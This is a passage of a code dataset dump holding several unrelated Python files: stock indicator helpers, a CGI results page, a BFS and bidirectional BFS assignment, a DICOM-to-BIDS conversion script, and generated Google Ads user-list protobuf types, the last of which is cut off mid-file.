'clip_list': clip_list,\n 'association': association,\n },\n )\n","sub_path":"pr/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"464164214","text":"import numpy as np\nimport pandas as pd\nfrom sklearn import linear_model\n\nDATE_OUTPUT_FORMAT = '%Y%m%d%H%M%S'\nREG_MODEL = linear_model.LinearRegression()\n\nBB_MEAN_COL_TEMP = '__bb_mean_col'\nBB_STD_COL_TEMP = '__bb_std_dev_col'\n\n\ndef chain(df):\n return Indicators(df)\n\n\nclass Indicators:\n\n def __init__(self, df):\n self.df = df\n\n def sma(self, period=30, name=None):\n name = 'sma{0}'.format(period) if name is None else name\n\n self.df[name] = self.df['close'].rolling(period).mean()\n return self\n\n def bollinger_band(self, period=30, n_std=2, upper_name=None, lower_name=None):\n\n upper_name 
= 'BB{0}Upper'.format(n_std) if upper_name is None else upper_name\n lower_name = 'BB{0}Lower'.format(n_std) if lower_name is None else lower_name\n\n self.df[BB_MEAN_COL_TEMP] = self.df['close'].rolling(period).mean()\n self.df[BB_STD_COL_TEMP] = self.df['close'].rolling(period).std()\n self.df[upper_name] = self.df[BB_MEAN_COL_TEMP] + n_std * self.df[BB_STD_COL_TEMP]\n self.df[lower_name] = self.df[BB_MEAN_COL_TEMP] - n_std * self.df[BB_STD_COL_TEMP]\n\n del self.df[BB_MEAN_COL_TEMP]\n del self.df[BB_STD_COL_TEMP]\n return self\n\n def linear_regression(self, period=10, name=None):\n name = 'RegLine{0}'.format(period) if name is None else name\n\n self.df[name] = self.df['close'].rolling(period).apply(Indicators._linear_regression_value)\n return self\n\n def drop_nan(self):\n self.df = self.df.dropna()\n return self\n\n def to_dict(self):\n self.df = self.df.reset_index()\n self.df['datetime'] = pd.to_numeric(self.df['datetime'].dt.strftime(DATE_OUTPUT_FORMAT))\n return self.df.to_dict(orient='records')\n\n @staticmethod\n def _linear_regression_value(data_list):\n data_size = data_list.size\n x_axis = np.array([range(data_list.size)]).T\n REG_MODEL.fit(x_axis, np.array(data_list))\n return REG_MODEL.predict(np.array(data_size))[0]\n","sub_path":"stocks/indicators/indicators.py","file_name":"indicators.py","file_ext":"py","file_size_in_byte":2014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"199205228","text":"#!/usr/bin/python3\n\nimport cgi\nimport html\nimport cgitb\ncgitb.enable()\n\n\ndef load_and_display(html, param_dict={}):\n with open(html) as f:\n data = f.read()\n print(\"Content-type: text/html\\n\")\n print(data % param_dict, end=\"\")\n\n \ndef load_results(file_name):\n with open(file_name) as f:\n lines = f.readlines()\n all_lines = html.escape(\"\\n\".join(lines))\n return all_lines.replace(\"\\n\", \"
\")\n \n\n\nresults = load_results(\"results.txt\")\nload_and_display(\"results.html\", vars())\n\n","sub_path":"lesson_python_file_and_web/cgi-bin/results.py","file_name":"results.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"322765908","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jul 19 16:35:08 2018\n\n@author: joeldavidson\n\"\"\"\n\nimport random\nimport matplotlib.pyplot as plt\nfrom collections import defaultdict as dic\n\n#create a dictionary as the adjacency list\nG = dic(list)\n\n'''\nBFS is a function that takes adjacency list G and vertices s and t\nand returns pair d (distance s to t), and k (number of nodes popped off)\n'''\n\n#4.a\n\ndef BFS(G,s,t):\n Q = [] # queue of vertices\n Q.append(s)\n \n #create a list of length of all elements and keys in G\n visited = [0] * (sum([len(v)+1 for k, v in G.items()]))\n #visited[s] = 1\n k = 0\n \n dist = [0] * len(visited)\n if s == t:\n return(0,0)\n while Q:\n s = Q.pop(0)\n k +=1\n \n for i in G[s]:\n if visited[i] == 0:\n dist[i] = dist[s] + 1\n Q.append(i)\n visited[i] = 1\n if i == t:\n return(dist[i],k)\n return(0,0)\n\n\n\n\n\n\n\n#4.b\n\ndef BiBFS(G,s,t):\n Q_s = [] # queue of vertices\n Q_s.append(s)\n Q_t = [] \n Q_t.append(t)\n \n #create two lists of length of all elements and keys in G + 10 so it is long enough\n visited_s = [False] * (sum([len(v)+1 for k, v in G.items()])+10)\n visited_s[s] = True\n visited_t = [False] * (sum([len(v)+1 for k, v in G.items()])+10)\n visited_t[t] = True\n k = 0\n \n \n dist_s = [0] * len(visited_s)\n dist_t = [0] * len(visited_t)\n if s == t:\n return(0,0)\n \n while Q_s and Q_t:\n if Q_s:\n \n s = Q_s.pop(0)\n k +=1\n \n #check all the vertices connected to s\n for i in G[s]:\n if visited_s[i] == False:\n dist_s[i] = dist_s[s] + 1\n Q_s.append(i)\n visited_s[i] = True\n \n #if the current vertex has been visited by the BFS from 
t, there is a path from s to t\n if visited_t[i] == True:\n return(dist_s[i]+dist_t[i],k)\n \n if Q_t:\n \n t = Q_t.pop(0)\n k += 1\n \n for j in G[t]:\n if visited_t[j] == False:\n dist_t[j] = dist_t[t] + 1\n Q_t.append(j)\n visited_t[j] = True\n \n if visited_s[j] == True:\n return(dist_s[j]+dist_t[j],k)\n #print(\"no path\")\n return(0,0)\n\n\n#input for testing\nG[1].append(2)\nG[2].append(1)\nG[1].append(3)\nG[3].append(1)\nG[2].append(4)\nG[4].append(2)\nG[2].append(5)\nG[5].append(2)\nG[3].append(6)\nG[6].append(3)\nG[3].append(7)\nG[7].append(3)\nG[7].append(8)\nG[8].append(7)\n\nprint(\"BFS test: \", BFS(G,1,8))\nprint(\"BiBFS test: \",BiBFS(G,1,8))\n\n\n\n\n#4.c.ii\n\n#function to create a binary tree of height n\ndef BinTreeBuilder(n):\n nodes = (2**(n-1))-1\n BT = dic(list)\n for i in range(1,nodes+1):\n #add the connection to the graph in both directions so it is an undirected graph\n BT[i].append(i*2)\n BT[i*2].append(i)\n BT[i].append((i*2)+1)\n BT[(i*2)+1].append(i)\n return BT\n\n\n\n\n\nK1List = []\nD1List = []\nK2List = []\nD2List = []\nnList = []\nfor i in range(3,16):\n BT = BinTreeBuilder(i)\n \n x,y = BFS(BT,1,len(BT))\n nList.append(i)\n D1List.append(x)\n K1List.append(y)\n \n q,r = BiBFS(BT,1,len(BT))\n D2List.append(q)\n K2List.append(r)\n \n \n''' \nprint(\"This is k1\", K1List)\nprint(\"This is d1\", D1List)\nprint(\"This is k2\", K2List)\nprint(\"This is d2\", D2List)\n'''\n\n\n\nax = plt.subplot()\nax.set(xlabel='n', ylabel='k', title='Binary Tree')\nplt.plot(nList, K1List)\nplt.plot(nList, K2List)\nplt.show()\n\n\n#4.c.iii\ndef RandGraphBuilder(n):\n #create a 2d list to keep track of vertices already visited\n Rvisited = [0] * n\n for i in range(n):\n Rvisited[i] = [0] * n\n #G is the dictionary that is the adjacency list\n G = dic(list)\n for i in range (0,n):\n for j in range (0,n):\n if not Rvisited[i][j] and not Rvisited[j][i]:\n Rvisited[i][j] = 1\n Rvisited[j][i] = 1\n e = random.randint(0, 1)\n if e:\n G[i].append(j)\n 
G[j].append(i)\n return G\n \nprint(\"This is the d and k value for BFS on the random graph w/ n = 20\", RandGraphBuilder(20))\nprint(BFS(RandGraphBuilder(20),1,2))\n\nprint(\"This is the d and k value for Bi-directional BFS on the random graph w/ n = 20\")\nprint(BiBFS(RandGraphBuilder(20),1,2))\n\n\nRandK1 = []\nRandK2 = []\nRandD1 = []\nRandD2 = []\nRandn = []\n\n#run the test n = {3,4...20} 50 times and take the average k results\nfor n in range(3,20):\n xavg = 0\n yavg = 0\n qavg = 0\n ravg = 0\n Randn.append(n)\n for i in range(0,50):\n RG = RandGraphBuilder(n)\n x,y = BFS(RG,1,2)\n \n q,r = BiBFS(RG,1,2)\n \n xavg += x\n yavg += y\n qavg += q\n ravg += r\n \n RandD1.append(xavg/50)\n RandK1.append(yavg/50)\n RandD2.append(qavg/50)\n RandK2.append(ravg/50)\n\nax = plt.subplot()\nax.set(xlabel='n', ylabel='k', title='Random Graph')\nplt.plot(Randn, RandK1)\nplt.plot(Randn, RandK2)\nplt.show()\n\n\n","sub_path":"BreadthFirstSearch.py","file_name":"BreadthFirstSearch.py","file_ext":"py","file_size_in_byte":5283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"104968878","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# %%\n\"\"\"\nCreated on Sep 2, 2021\n\n@author: Or Duek\nA short script that will convert to NIFTI.GZ (from raw DICOM data) and then create a BIDS compatible structure\n\"\"\"\n\n# convert to NIFTI\nimport os \nfrom nipype.interfaces.dcm2nii import Dcm2niix\nimport shutil\n\n# %% Convert functions Converts DICOM to NIFTI.GZ\ndef convert (source_dir, output_dir, subName, session): # this is a function that takes input directory, output directory and subject name and then converts everything accordingly\n try:\n os.makedirs(os.path.join(output_dir, subName, session))\n except:\n print (\"folder already there\")\n# try:\n# os.makedirs(os.path.join(output_dir, subName, ))\n# except:\n# print(\"Folder Exist\") \n converter = Dcm2niix()\n converter.inputs.source_dir = source_dir\n 
converter.inputs.compression = 7\n converter.inputs.output_dir = os.path.join(output_dir, subName, session)\n converter.inputs.out_filename = subName + 'seriesNo' '_' + '%2s' + '%p'\n converter.run()\n\n# %% Check functions\ndef checkGz (extension):\n # check if nifti gz or something else\n if extension[1] =='.gz':\n return '.nii.gz'\n else:\n return extension[1]\n\ndef checkTask(filename):\n\t\n nameTask = filename.split('seriesNo_')[1].split('cmrr')[0]#.replace('-', '')\t \n\t\n return nameTask\n\n\n# %%\ndef organizeFiles(output_dir, subName, session):\n \n fullPath = os.path.join(output_dir, subName, session)\n os.makedirs(fullPath + '/dwi')\n os.makedirs(fullPath + '/anat') \n os.makedirs(fullPath + '/func')\n os.makedirs(fullPath + '/misc') \n \n a = next(os.walk(fullPath)) # list the subfolders under subject name\n\n # run through the possibilities and match directory with scan number (day)\n for n in a[2]:\n print (n)\n b = os.path.splitext(n)\n # add method to find (MB**) in filename and scrape it\n if n.find('diff')!=-1:\n print ('This file is DWI')\n shutil.move((fullPath +'/' + n), fullPath + '/dwi/' + n)\n os.rename((os.path.join(fullPath, 'dwi' ,n)), (fullPath + '/' + 'dwi' +'/' + subName + '_' + session +'_dwi' + checkGz(b)))\n \n elif n.find('MPRAGE')!=-1:\n print (n + ' Is Anat')\n shutil.move((fullPath + '/' + n), (fullPath + '/anat/' + n))\n os.rename(os.path.join(fullPath,'anat' , n), (fullPath + '/anat/' + subName+ '_' + session + '_acq-mprage_T1w' + checkGz(b)))\n elif n.find('t1_flash')!=-1:\n print (n + ' Is Anat')\n shutil.move((fullPath + '/' + n), (fullPath + '/anat/' + n))\n os.rename(os.path.join(fullPath,'anat' , n), (fullPath + '/anat/' + subName+ '_' + session + '_acq-flash_T1w' + checkGz(b)))\n elif n.find('t1_fl2d')!=-1:\n print (n + ' Is Anat')\n shutil.move((fullPath + '/' + n), (fullPath + '/anat/' + n))\n os.rename(os.path.join(fullPath,'anat' , n), (fullPath + '/anat/' + subName+ '_' + session + '_acq-fl2d1_T1w' + checkGz(b))) 
\n elif n.find('GRE_3D_Sag_Spoiled')!=-1:\n print (n + ' Is Anat')\n shutil.move((fullPath + '/' + n), (fullPath + '/anat/' + n))\n os.rename(os.path.join(fullPath,'anat' , n), (fullPath + '/anat/' + subName+ '_' + session + '_acq-gre_spoiled_T1w' + checkGz(b))) \n elif n.find('bold')!=-1:\n print(n + ' Is functional')\n taskName = checkTask(n)\n shutil.move((fullPath + '/' + n), (fullPath + '/func/' + n))\n os.rename(os.path.join(fullPath, 'func', n), (fullPath + '/func/' +subName+'_' +session + '_task-' + taskName + '_bold' + checkGz(b)))\n else:\n print (n + 'Is MISC')\n shutil.move((fullPath + '/' + n), (fullPath + '/misc/' + n))\n # os.rename(os.path.join(fullPath, 'misc', n), (fullPath +'/misc/' +'sub-'+subName+'_ses-' +sessionNum + '_MISC' + checkGz(b)))\n \n# need to run thorugh misc folder and extract t1's when there is no MPRAGE - Need to solve issue with t1 - as adding the names is not validated with BIDS\n\n# %%\nsessionDict = {\n 'ses-1': '/media/Data/Lab_Projects/R_A_ID/neuroimaging/raw_dicom/pc1079_levy/',\n #'ses-2': '/media/Data/Lab_Projects/KPE_PTSD_Project/neuroimaging/raw_dicom/kpe1587/kpe1587_scan2_pb10759_harpaz-rotem',\n #'ses-3': '/media/Data/Lab_Projects/neurofeedback/neuroimaging/raw_scan_data/NF1551/nf1551_scan3_pb9903',\n#'ses-4': '/media/Data/Lab_Projects/neurofeedback/neuroimaging/raw_scan_data/NF1551/nf1551_scan4_pb9940',\n }\nsubNumber = '1079'\ndef fullBids(subNumber, sessionDict):\n output_dir = '/media/Data/Lab_Projects/R_A_ID/neuroimaging/R_A_ID_BIDS/'\n subName = 'sub-' + subNumber\n # folder_name = ['anat','func','dwi','other']\n \n for i in sessionDict:\n session = i\n source_dir = sessionDict[i]\n print (session, source_dir)\n fullPath = os.path.join(output_dir, subName, session)\n print(fullPath)\n convert(source_dir, output_dir, subName, session)\n organizeFiles(output_dir, subName, session) \n \n \n #print (v)\n# %%\nfullBids(subNumber, sessionDict)\n\n# 
%%\n\n","sub_path":"convertBIDS/creatBIDS_R_Aid.py","file_name":"creatBIDS_R_Aid.py","file_ext":"py","file_size_in_byte":5205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"10691402","text":"# -*- coding: utf-8 -*-\n# Copyright 2023 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\nfrom __future__ import annotations\n\nfrom typing import MutableSequence\n\nimport proto # type: ignore\n\nfrom google.ads.googleads.v14.enums.types import customer_match_upload_key_type\nfrom google.ads.googleads.v14.enums.types import user_list_crm_data_source_type\nfrom google.ads.googleads.v14.enums.types import (\n user_list_date_rule_item_operator,\n)\nfrom google.ads.googleads.v14.enums.types import (\n user_list_flexible_rule_operator,\n)\nfrom google.ads.googleads.v14.enums.types import user_list_logical_rule_operator\nfrom google.ads.googleads.v14.enums.types import (\n user_list_number_rule_item_operator,\n)\nfrom google.ads.googleads.v14.enums.types import user_list_prepopulation_status\nfrom google.ads.googleads.v14.enums.types import user_list_rule_type\nfrom google.ads.googleads.v14.enums.types import (\n user_list_string_rule_item_operator,\n)\n\n\n__protobuf__ = proto.module(\n package=\"google.ads.googleads.v14.common\",\n marshal=\"google.ads.googleads.v14\",\n manifest={\n \"SimilarUserListInfo\",\n \"CrmBasedUserListInfo\",\n \"UserListRuleInfo\",\n \"UserListRuleItemGroupInfo\",\n 
\"UserListRuleItemInfo\",\n \"UserListDateRuleItemInfo\",\n \"UserListNumberRuleItemInfo\",\n \"UserListStringRuleItemInfo\",\n \"FlexibleRuleOperandInfo\",\n \"FlexibleRuleUserListInfo\",\n \"RuleBasedUserListInfo\",\n \"LogicalUserListInfo\",\n \"UserListLogicalRuleInfo\",\n \"LogicalUserListOperandInfo\",\n \"BasicUserListInfo\",\n \"UserListActionInfo\",\n },\n)\n\n\nclass SimilarUserListInfo(proto.Message):\n r\"\"\"SimilarUserList is a list of users which are similar to users\n from another UserList. These lists are read-only and\n automatically created by Google.\n\n .. _oneof: https://proto-plus-python.readthedocs.io/en/stable/fields.html#oneofs-mutually-exclusive-fields\n\n Attributes:\n seed_user_list (str):\n Seed UserList from which this list is\n derived.\n\n This field is a member of `oneof`_ ``_seed_user_list``.\n \"\"\"\n\n seed_user_list: str = proto.Field(\n proto.STRING,\n number=2,\n optional=True,\n )\n\n\nclass CrmBasedUserListInfo(proto.Message):\n r\"\"\"UserList of CRM users provided by the advertiser.\n .. _oneof: https://proto-plus-python.readthedocs.io/en/stable/fields.html#oneofs-mutually-exclusive-fields\n\n Attributes:\n app_id (str):\n A string that uniquely identifies a mobile\n application from which the data was collected.\n For iOS, the ID string is the 9 digit string\n that appears at the end of an App Store URL (for\n example, \"476943146\" for \"Flood-It! 
2\" whose App\n Store link is\n http://itunes.apple.com/us/app/flood-it!-2/id476943146).\n For Android, the ID string is the application's\n package name (for example,\n \"com.labpixies.colordrips\" for \"Color Drips\"\n given Google Play link\n https://play.google.com/store/apps/details?id=com.labpixies.colordrips).\n Required when creating CrmBasedUserList for\n uploading mobile advertising IDs.\n\n This field is a member of `oneof`_ ``_app_id``.\n upload_key_type (google.ads.googleads.v14.enums.types.CustomerMatchUploadKeyTypeEnum.CustomerMatchUploadKeyType):\n Matching key type of the list.\n Mixed data types are not allowed on the same\n list. This field is required for an ADD\n operation.\n data_source_type (google.ads.googleads.v14.enums.types.UserListCrmDataSourceTypeEnum.UserListCrmDataSourceType):\n Data source of the list. Default value is FIRST_PARTY. Only\n customers on the allow-list can create third-party sourced\n CRM lists.\n \"\"\"\n\n app_id: str = proto.Field(\n proto.STRING,\n number=4,\n optional=True,\n )\n upload_key_type: customer_match_upload_key_type.CustomerMatchUploadKeyTypeEnum.CustomerMatchUploadKeyType = proto.Field(\n proto.ENUM,\n number=2,\n enum=customer_match_upload_key_type.CustomerMatchUploadKeyTypeEnum.CustomerMatchUploadKeyType,\n )\n data_source_type: user_list_crm_data_source_type.UserListCrmDataSourceTypeEnum.UserListCrmDataSourceType = proto.Field(\n proto.ENUM,\n number=3,\n enum=user_list_crm_data_source_type.UserListCrmDataSourceTypeEnum.UserListCrmDataSourceType,\n )\n\n\nclass UserListRuleInfo(proto.Message):\n r\"\"\"A client defined rule based on custom parameters sent by web\n sites or uploaded by the advertiser.\n\n Attributes:\n rule_type (google.ads.googleads.v14.enums.types.UserListRuleTypeEnum.UserListRuleType):\n Rule type is used to determine how to group\n rule items.\n The default is OR of ANDs (disjunctive normal\n form). 
That is, rule items will be ANDed\n together within rule item groups and the groups\n themselves will be ORed together.\n\n OR of ANDs is the only supported type for\n FlexibleRuleUserList.\n rule_item_groups (MutableSequence[google.ads.googleads.v14.common.types.UserListRuleItemGroupInfo]):\n List of rule item groups that defines this rule. Rule item\n groups are grouped together based on rule_type.\n \"\"\"\n\n rule_type: user_list_rule_type.UserListRuleTypeEnum.UserListRuleType = (\n proto.Field(\n proto.ENUM,\n number=1,\n enum=user_list_rule_type.UserListRuleTypeEnum.UserListRuleType,\n )\n )\n rule_item_groups: MutableSequence[\n \"UserListRuleItemGroupInfo\"\n ] = proto.RepeatedField(\n proto.MESSAGE,\n number=2,\n message=\"UserListRuleItemGroupInfo\",\n )\n\n\nclass UserListRuleItemGroupInfo(proto.Message):\n r\"\"\"A group of rule items.\n Attributes:\n rule_items (MutableSequence[google.ads.googleads.v14.common.types.UserListRuleItemInfo]):\n Rule items that will be grouped together based on rule_type.\n \"\"\"\n\n rule_items: MutableSequence[\"UserListRuleItemInfo\"] = proto.RepeatedField(\n proto.MESSAGE,\n number=1,\n message=\"UserListRuleItemInfo\",\n )\n\n\nclass UserListRuleItemInfo(proto.Message):\n r\"\"\"An atomic rule item.\n This message has `oneof`_ fields (mutually exclusive fields).\n For each oneof, at most one member field can be set at the same time.\n Setting any member of the oneof automatically clears all other\n members.\n\n .. _oneof: https://proto-plus-python.readthedocs.io/en/stable/fields.html#oneofs-mutually-exclusive-fields\n\n Attributes:\n name (str):\n Rule variable name. It should match the corresponding key\n name fired by the pixel. A name must begin with US-ascii\n letters or underscore or UTF8 code that is greater than 127\n and consist of US-ascii letters or digits or underscore or\n UTF8 code that is greater than 127. 
For websites, there are\n two built-in variable URL (name = 'url__') and referrer URL\n (name = 'ref_url__'). This field must be populated when\n creating a new rule item.\n\n This field is a member of `oneof`_ ``_name``.\n number_rule_item (google.ads.googleads.v14.common.types.UserListNumberRuleItemInfo):\n An atomic rule item composed of a number\n operation.\n\n This field is a member of `oneof`_ ``rule_item``.\n string_rule_item (google.ads.googleads.v14.common.types.UserListStringRuleItemInfo):\n An atomic rule item composed of a string\n operation.\n\n This field is a member of `oneof`_ ``rule_item``.\n date_rule_item (google.ads.googleads.v14.common.types.UserListDateRuleItemInfo):\n An atomic rule item composed of a date\n operation.\n\n This field is a member of `oneof`_ ``rule_item``.\n \"\"\"\n\n name: str = proto.Field(\n proto.STRING,\n number=5,\n optional=True,\n )\n number_rule_item: \"UserListNumberRuleItemInfo\" = proto.Field(\n proto.MESSAGE,\n number=2,\n oneof=\"rule_item\",\n message=\"UserListNumberRuleItemInfo\",\n )\n string_rule_item: \"UserListStringRuleItemInfo\" = proto.Field(\n proto.MESSAGE,\n number=3,\n oneof=\"rule_item\",\n message=\"UserListStringRuleItemInfo\",\n )\n date_rule_item: \"UserListDateRuleItemInfo\" = proto.Field(\n proto.MESSAGE,\n number=4,\n oneof=\"rule_item\",\n message=\"UserListDateRuleItemInfo\",\n )\n\n\nclass UserListDateRuleItemInfo(proto.Message):\n r\"\"\"A rule item composed of a date operation.\n .. _oneof: https://proto-plus-python.readthedocs.io/en/stable/fields.html#oneofs-mutually-exclusive-fields\n\n Attributes:\n operator (google.ads.googleads.v14.enums.types.UserListDateRuleItemOperatorEnum.UserListDateRuleItemOperator):\n Date comparison operator.\n This field is required and must be populated\n when creating new date rule item.\n value (str):\n String representing date value to be compared\n with the rule variable. Supported date format is\n YYYY-MM-DD. 
Times are reported in the customer's\n time zone.\n\n This field is a member of `oneof`_ ``_value``.\n offset_in_days (int):\n The relative date value of the right hand\n side denoted by number of days offset from now.\n The value field will override this field when\n both are present.\n\n This field is a member of `oneof`_ ``_offset_in_days``.\n \"\"\"\n\n operator: user_list_date_rule_item_operator.UserListDateRuleItemOperatorEnum.UserListDateRuleItemOperator = proto.Field(\n proto.ENUM,\n number=1,\n enum=user_list_date_rule_item_operator.UserListDateRuleItemOperatorEnum.UserListDateRuleItemOperator,\n )\n value: str = proto.Field(\n proto.STRING,\n number=4,\n optional=True,\n )\n offset_in_days: int = proto.Field(\n proto.INT64,\n number=5,\n optional=True,\n )\n\n\nclass UserListNumberRuleItemInfo(proto.Message):\n r\"\"\"A rule item composed of a number operation.\n .. _oneof: https://proto-plus-python.readthedocs.io/en/stable/fields.html#oneofs-mutually-exclusive-fields\n\n Attributes:\n operator (google.ads.googleads.v14.enums.types.UserListNumberRuleItemOperatorEnum.UserListNumberRuleItemOperator):\n Number comparison operator.\n This field is required and must be populated\n when creating a new number rule item.\n value (float):\n Number value to be compared with the\n variable. This field is required and must be\n populated when creating a new number rule item.\n\n This field is a member of `oneof`_ ``_value``.\n \"\"\"\n\n operator: user_list_number_rule_item_operator.UserListNumberRuleItemOperatorEnum.UserListNumberRuleItemOperator = proto.Field(\n proto.ENUM,\n number=1,\n enum=user_list_number_rule_item_operator.UserListNumberRuleItemOperatorEnum.UserListNumberRuleItemOperator,\n )\n value: float = proto.Field(\n proto.DOUBLE,\n number=3,\n optional=True,\n )\n\n\nclass UserListStringRuleItemInfo(proto.Message):\n r\"\"\"A rule item composed of a string operation.\n .. 
_oneof: https://proto-plus-python.readthedocs.io/en/stable/fields.html#oneofs-mutually-exclusive-fields\n\n Attributes:\n operator (google.ads.googleads.v14.enums.types.UserListStringRuleItemOperatorEnum.UserListStringRuleItemOperator):\n String comparison operator.\n This field is required and must be populated\n when creating a new string rule item.\n value (str):\n The right hand side of the string rule item.\n For URLs or referrer URLs, the value can not\n contain illegal URL chars such as newlines,\n quotes, tabs, or parentheses. This field is\n required and must be populated when creating a\n new string rule item.\n\n This field is a member of `oneof`_ ``_value``.\n \"\"\"\n\n operator: user_list_string_rule_item_operator.UserListStringRuleItemOperatorEnum.UserListStringRuleItemOperator = proto.Field(\n proto.ENUM,\n number=1,\n enum=user_list_string_rule_item_operator.UserListStringRuleItemOperatorEnum.UserListStringRuleItemOperator,\n )\n value: str = proto.Field(\n proto.STRING,\n number=3,\n optional=True,\n )\n\n\nclass FlexibleRuleOperandInfo(proto.Message):\n r\"\"\"Flexible rule that wraps the common rule and a lookback\n window.\n\n .. _oneof: https://proto-plus-python.readthedocs.io/en/stable/fields.html#oneofs-mutually-exclusive-fields\n\n Attributes:\n rule (google.ads.googleads.v14.common.types.UserListRuleInfo):\n List of rule item groups that defines this\n rule. Rule item groups are grouped together.\n lookback_window_days (int):\n Lookback window for this rule in days. From\n now until X days ago.\n\n This field is a member of `oneof`_ ``_lookback_window_days``.\n \"\"\"\n\n rule: \"UserListRuleInfo\" = proto.Field(\n proto.MESSAGE,\n number=1,\n message=\"UserListRuleInfo\",\n )\n lookback_window_days: int = proto.Field(\n proto.INT64,\n number=2,\n optional=True,\n )\n\n\nclass FlexibleRuleUserListInfo(proto.Message):\n r\"\"\"Flexible rule representation of visitors with one or multiple\n actions. 
The flexible user list is defined by two lists of operands\n – inclusive_operands and exclusive_operands; each operand represents\n a set of users based on actions they took in a given timeframe.\n These lists of operands are combined with the AND_NOT operator, so\n that users represented by the inclusive operands are included in the\n user list, minus the users represented by the exclusive operands.\n\n Attributes:\n inclusive_rule_operator (google.ads.googleads.v14.enums.types.UserListFlexibleRuleOperatorEnum.UserListFlexibleRuleOperator):\n Operator that defines how the inclusive\n operands are combined.\n inclusive_operands (MutableSequence[google.ads.googleads.v14.common.types.FlexibleRuleOperandInfo]):\n Rules representing users that should be included in the user\n list. These are located on the left side of the AND_NOT\n operator, and joined together by either AND/OR as specified\n by the inclusive_rule_operator.\n exclusive_operands (MutableSequence[google.ads.googleads.v14.common.types.FlexibleRuleOperandInfo]):\n Rules representing users that should be excluded from the\n user list. 
These are located on the right side of the\n AND_NOT operator, and joined together by OR.\n \"\"\"\n\n inclusive_rule_operator: user_list_flexible_rule_operator.UserListFlexibleRuleOperatorEnum.UserListFlexibleRuleOperator = proto.Field(\n proto.ENUM,\n number=1,\n enum=user_list_flexible_rule_operator.UserListFlexibleRuleOperatorEnum.UserListFlexibleRuleOperator,\n )\n inclusive_operands: MutableSequence[\n \"FlexibleRuleOperandInfo\"\n ] = proto.RepeatedField(\n proto.MESSAGE,\n number=2,\n message=\"FlexibleRuleOperandInfo\",\n )\n exclusive_operands: MutableSequence[\n \"FlexibleRuleOperandInfo\"\n ] = proto.RepeatedField(\n proto.MESSAGE,\n number=3,\n message=\"FlexibleRuleOperandInfo\",\n )\n\n\nclass RuleBasedUserListInfo(proto.Message):\n r\"\"\"Representation of a userlist that is generated by a rule.\n Attributes:\n prepopulation_status (google.ads.googleads.v14.enums.types.UserListPrepopulationStatusEnum.UserListPrepopulationStatus):\n The status of pre-population. The field is\n default to NONE if not set which means the\n previous users will not be considered. If set to\n REQUESTED, past site visitors or app users who\n match the list definition will be included in\n the list (works on the Display Network only).\n This will only add past users from within the\n last 30 days, depending on the list's membership\n duration and the date when the remarketing tag\n is added. The status will be updated to FINISHED\n once request is processed, or FAILED if the\n request fails.\n flexible_rule_user_list (google.ads.googleads.v14.common.types.FlexibleRuleUserListInfo):\n Flexible rule representation of visitors with one or\n multiple actions. The flexible user list is defined by two\n lists of operands – inclusive_operands and\n exclusive_operands; each operand represents a set of users\n based on actions they took in a given timeframe. 
These lists\n of operands are combined with the AND_NOT operator, so that\n users represented by the inclusive operands are included in\n the user list, minus the users represented by the exclusive\n operands.\n \"\"\"\n\n prepopulation_status: user_list_prepopulation_status.UserListPrepopulationStatusEnum.UserListPrepopulationStatus = proto.Field(\n proto.ENUM,\n number=1,\n enum=user_list_prepopulation_status.UserListPrepopulationStatusEnum.UserListPrepopulationStatus,\n )\n flexible_rule_user_list: \"FlexibleRuleUserListInfo\" = proto.Field(\n proto.MESSAGE,\n number=5,\n message=\"FlexibleRuleUserListInfo\",\n )\n\n\nclass LogicalUserListInfo(proto.Message):\n r\"\"\"Represents a user list that is a custom combination of user\n lists.\n\n Attributes:\n rules (MutableSequence[google.ads.googleads.v14.common.types.UserListLogicalRuleInfo]):\n Logical list rules that define this user\n list. The rules are defined as a logical\n operator (ALL/ANY/NONE) and a list of user\n lists. All the rules are ANDed when they are\n evaluated.\n\n Required for creating a logical user list.\n \"\"\"\n\n rules: MutableSequence[\"UserListLogicalRuleInfo\"] = proto.RepeatedField(\n proto.MESSAGE,\n number=1,\n message=\"UserListLogicalRuleInfo\",\n )\n\n\nclass UserListLogicalRuleInfo(proto.Message):\n r\"\"\"A user list logical rule. 
A rule has a logical operator\n (and/or/not) and a list of user lists as operands.\n\n Attributes:\n operator (google.ads.googleads.v14.enums.types.UserListLogicalRuleOperatorEnum.UserListLogicalRuleOperator):\n The logical operator of the rule.\n rule_operands (MutableSequence[google.ads.googleads.v14.common.types.LogicalUserListOperandInfo]):\n The list of operands of the rule.\n \"\"\"\n\n operator: user_list_logical_rule_operator.UserListLogicalRuleOperatorEnum.UserListLogicalRuleOperator = proto.Field(\n proto.ENUM,\n number=1,\n enum=user_list_logical_rule_operator.UserListLogicalRuleOperatorEnum.UserListLogicalRuleOperator,\n )\n rule_operands: MutableSequence[\n \"LogicalUserListOperandInfo\"\n ] = proto.RepeatedField(\n proto.MESSAGE,\n number=2,\n message=\"LogicalUserListOperandInfo\",\n )\n\n\nclass LogicalUserListOperandInfo(proto.Message):\n r\"\"\"Operand of logical user list that consists of a user list.\n .. _oneof: https://proto-plus-python.readthedocs.io/en/stable/fields.html#oneofs-mutually-exclusive-fields\n\n Attributes:\n user_list (str):\n Resource name of a user list as an operand.\n\n This field is a member of `oneof`_ ``_user_list``.\n \"\"\"\n\n user_list: str = proto.Field(\n proto.STRING,\n number=2,\n optional=True,\n )\n\n\nclass BasicUserListInfo(proto.Message):\n r\"\"\"User list targeting as 